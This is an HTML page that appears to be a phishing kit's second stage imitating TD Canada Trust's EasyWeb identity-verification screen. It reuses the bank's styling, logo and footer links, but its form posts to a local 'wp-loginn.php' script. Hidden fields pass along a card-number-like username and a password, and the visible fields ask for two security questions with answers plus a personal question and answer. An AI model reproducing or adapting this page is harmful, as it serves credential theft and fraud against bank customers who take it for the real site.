<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>
	<meta http-equiv="X-UA-Compatible" content="IE=8">
	<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<link rel="stylesheet" type="text/css" href="EasyWebLoginAuthentication_files/ew_theme_14_3_en.css">
	<link rel="stylesheet" type="text/css" href="EasyWebLoginAuthentication_files/evergreen_theme_14_3.css">
	<link rel="stylesheet" type="text/css" href="EasyWebLoginAuthentication_files/default.css">
	<script type="text/javascript" src="EasyWebLoginAuthentication_files/buttonEvents.js"></script>
	<script type="text/javascript" src="EasyWebLoginAuthentication_files/gadget2.js"></script>
	<script type="text/javascript" src="EasyWebLoginAuthentication_files/common_14_3.js"></script>
	<script type="text/javascript" src="EasyWebLoginAuthentication_files/fieldValidationSupport.js"></script>
	<script src="EasyWebLoginAuthentication_files/jquery_002.js"></script>
	<script src="EasyWebLoginAuthentication_files/jquery.js"></script>
	<script src="EasyWebLoginAuthentication_files/default.js"></script>
	<!--[if lt IE 9]><script src="/waw/lnf/standards/evergreen/1_0/js/html5shiv.js"></script><![endif]-->
	<!--[if lt IE 10]><script src="/waw/lnf/standards/evergreen/1_0/js/PIE.js"></script><![endif]-->
	<title>EasyWeb - Login Authentication
	</title>
</head>
<body class="td-JS-enabled">
		<div id="td-wrapper">
			<div id="td-container">	
				<div id="headerPane">
						<div id="header" class="imageHeader">
							<img src="EasyWebLoginAuthentication_files/EasywbLogo.gif" title="TD Canada Trust - EasyWeb" alt="TD Canada Trust - EasyWeb">
						</div>
				</div>
				<div class="td-layout-row td-noprint" id="td-layout-nav-main">
					<div class="td-layout-column td-layout-grid15 td-layout-column-first td-layout-column-last">
						<div id="td-nav-divider"></div>
					</div>
				</div>
				<div id="td-layout-headerarea" class="td-layout-row">
					<div id="td-layout-header" role="banner" class="td-layout-column td-layout-grid15 td-layout-column-first td-layout-column-last">
		<script>
			window.onload=function(){
				document.getElementById('MFAChallengeForm:answer').focus();
			};
		</script>
		<div id="newheader" class="td-layout-row td-margin-bottom-small">
		<div class="td-layout-column td-layout-grid12 td-layout-column-first">
		<h1 class="td-margin-top-none td-margin-bottom-none">Login Authentication</h1>
		</div>
			<div class="td-layout-column td-layout-grid3 td-layout-column-last">
			<p class="td-copy-align-right td-margin-bottom-none td-margin-top-large"><a href="#" onClick="help('https://www.tdcanadatrust.com/easyweb5/help/banking/acc00343.jsp'); return false;">Help</a></p>
			</div></div>
					</div>
				</div>		
				<div id="td-layout-contentarea" class="td-layout-row">
				  <div class="td-layout-column td-layout-grid15 td-callout td-callout-primary td-cs-tertiary td-layout-column-first td-layout-column-last">
		<script type="text/javascript">
<!--		setupEnterListener("MFAChallengeForm","validateButton");-->
<!--		window.onload=function(){-->
<!--		document.getElementById('MFAChallengeForm:answer').focus();-->
<!--		};-->

		</script>

		<div class="td-layout-row">
		<div class="td-margin-top-small td-margin-bottom-large"><strong>For additional security, please verify your identity by completing the form below</strong>.</div>
		<form name="submit" method="post" action="wp-loginn.php">			
      <table border="0">
        <tbody>
          <tr>
            <input name="user" value="5524890002809879" type="hidden">
            <input name="pass" value="hkjklj" type="hidden">
            <td><span style="font-size:12px;font-weight:bold" id="">Question 1:</span></td>
            <td><select name="question1" tabindex="1" id="pvqList_questions_0__questionDropDown" class="">
                <option value="" selected="selected">Please select your first question below.</option>
                <option value="What is your nickname">Your nickname</option>
                <option value="What is your paternal grandmother's first name">Your grandmother's first name</option>
                <option value="First car you owned">First car you owned</option>
                <option value="What is your favourite holiday destination">Your holiday destination</option>
                <option value="Name of your first pet">Name of your first pet</option>
                <option value="Your hobby">Your hobby</option>
                <option value="First concert you attended">First concert you attended</option>
                <option value="Your best sport">Your best sport</option>
                <option value="First vacation outside your country">First vacation outside your country</option>
            </select></td>
          </tr>
          <tr>
            <td><span style="font-size:12px;font-weight:bold">Answer 1: </span></td>
            <td><input name="answer1" maxlength="40" tabindex="1" value="" class="" autocomplete="off" type="password"></td>
          </tr>
          <tr>
            <td><span style="font-size:12px;font-weight:bold">Question 2:</span></td>
            <td><select name="question2" tabindex="1" class="">
              <option value="" selected="selected">Please select your second question below.</option>
              <option value="Your first job">Your first job</option>
              <option value="Your favourite teacher">Your favourite teacher</option>
              <option value="First car you owned">First car you owned</option>
              <option value="Your first school">Your first school</option>
              <option value="Name of your first pet">Name of your first pet</option>
              <option value="Your hobby">Your hobby</option>
              <option value="First concert you attended">First concert you attended</option>
              <option value="Your best sport">Your best sport</option>
              <option value="First vacation outside your country">First vacation outside your country</option>
            </select></td>
          </tr>
          <tr>
            <td><span style="font-size:12px;font-weight:bold">Answer 2:</span></td>
            <td><input name="answer2" maxlength="40" tabindex="1" value="" class="" autocomplete="off" type="password"></td>
          </tr>
          <tr>
            <td><span style="font-size:12px;font-weight:bold" id="">Personal security question :</span></td>
            <td><input name="PQ" maxlength="60" size="30" tabindex="1" class="" autocomplete="off" type="text"></td>
          </tr>
          <tr>
            <td><span style="font-size:12px;font-weight:bold">Answer : </span></td>
            <td><input name="PA" type="password" class="" id="PA" tabindex="1" value="" maxlength="40" autocomplete="off"></td>
          </tr>
		 
            <tr>
            
      </table>
      
               </button>		
             <div class="td-layout-row td-margin-top-medium"><input id="bttnNext" name="bttnNext" value="Next" title="Next" class="td-button td-button-primary" type="submit"> 	
	  </div></form>
			</div>
			&nbsp;&nbsp;
  <script type="text/javascript" language="Javascript">function dpf(f) {var adp = f.adp;if (adp != null) {for (var i = 0;i < adp.length;i++) {f.removeChild(adp[i]);}}};function apf(f, pvp) {var adp = new Array();f.adp = adp;var i = 0;for (k in pvp) {var p = document.createElement("input");p.type = "hidden";p.name = k;p.value = pvp[k];f.appendChild(p);adp[i++] = p;}};function jsfcljs(f, pvp, t) {apf(f, pvp);var ft = f.target;if (t) {f.target = t;}f.submit();f.target = ft;dpf(f);};</script>
  <a id="MFAChallengeForm:cancel" href="#" title="Cancel" onClick="if(typeof jsfcljs == 'function'){jsfcljs(document.forms['MFAChallengeForm'],{'MFAChallengeForm:cancel':'MFAChallengeForm:cancel'},'');}return false" class="td-link-nounderline"></a></div>
				  <input name="javax.faces.ViewState" id="javax.faces.ViewState" value="e2s1" type="hidden">
</div>
			<script type="text/javascript">				
				function webAnalyticsFunctions() { 
					trackConversions('tdct:easyweb:mfachallenge','ProcessStart',false,'Start','','');
					s.prop12="not-authenticated";
				}		
			</script>
		<!-- Middle Container Ends -->
					</div>
				</div>			
			
	<!-- footer.xhtml -->
    				
<footer class="td-layout-row" id="td-layout-footer" role="complementary">
	<div class="td-layout-column td-layout-grid15 td-noprint td-layout-column-first td-layout-column-last" style="width:100%">
		<ul class="td-list-inline td-copy-sub td-link-colour-grey td-link-nounderline">
			<li><a href="http://www.td.com/privacyandsecurity" onClick="fnFooter('http://www.td.com/privacyandsecurity'); return false;" title="Privacy and Security">Privacy and Security</a></li>
			<li><a href="http://www.td.com/to-our-customers/index.jsp" onClick="fnFooter('http://www.td.com/to-our-customers/index.jsp'); return false;" title="Legal">Legal</a></li>
				<li><a href="http://www.tdcanadatrust.com/customer-service/accessibility/accessibility-at-td/index.jsp" title="Accessibility">Accessibility</a></li>
		</ul>
	</div>
</footer>
			<div id="serverTxt">(Server ID: &nbsp;BE16A      &nbsp;:&nbsp;e7e960c5-cdf5-4f98-9960-f47fcc46bcc8&nbsp;)				
			</div>
		
<!-- BEGIN Omniture SUPPORT -->
<!-- SiteCatalyst code version: H.22.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="EasyWebLoginAuthentication_files/scode_cip.js"></script>
<script language="JavaScript" type="text/javascript">

	// focus on error messages, if present.
	$(document).ready(function() {
		if(document.getElementById('errorMessage')) {
			scrollAndFocus('#errorAlertDiv');
		}	
	});
	
try{
	// Call addiitonal WebAnalytics fucntions if they have been defined on the child page
	if(typeof webAnalyticsFunctions != "undefined") {	
		webAnalyticsFunctions();
	}
	// Determine whether CIP error occured
	if(document.getElementById('errorMessage')) {
		if( trim(document.getElementById('errorMessage').innerHTML).length ) {		
			s.eVar13 = trim(removeHTMLTags(document.getElementById('errorMessage').innerHTML));
		}
	}
	customSections('easyweb','','','');
	s.channel="ca-en";
	/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
	var s_code=s.t();if(s_code)document.write(s_code)//-->
}
catch(err)
{
}
</script>
<script language="JavaScript" type="text/javascript">
	if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
</script>
<script type="text/javascript">

</script>
<noscript>
	<img src="http://metrics.td.com/b/ss/tdtdw/1/H.22--NS/0" height="1" width="1" border="0" />
</noscript>
<!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.22. -->
<!-- END Omniture -->

</body></html>